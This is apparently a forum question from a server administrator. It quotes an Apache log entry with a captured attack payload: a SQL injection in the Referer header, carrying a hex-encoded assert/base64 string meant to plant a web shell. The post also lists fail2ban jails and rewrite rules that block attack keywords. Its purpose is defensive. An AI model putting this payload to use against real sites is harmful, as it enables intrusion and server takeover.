I've been seeing a lot of this in my Apache access log

14.210.192.182 - - [01/May/2019:04:43:14 -0500] "GET /user.php?act=login HTTP/1.1" 302 233 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:288:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" I'm not even sure how this type of exploit would work. It looks like it's trying to run sql from referer serialized data. Is this anything to worry about? All of the web apps on the server are using PDO with prepared statements. Jail list: apache-badbots, apache-noscript, apache-overflows, apache-sqlinject, sshd RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR] RewriteCond %{QUERY_STRING} ^.*(union|schema|sql|jdatabasedriver|ini_set|user\.php).* [NC] RewriteRule ^(.*)$ - [F,L] RewriteCond %{HTTP_REFERER} ^.*(union|schema|sql|jdatabasedriver|ini_set|user\.php).* [NC] RewriteRule ^(.*)$ - [F,L]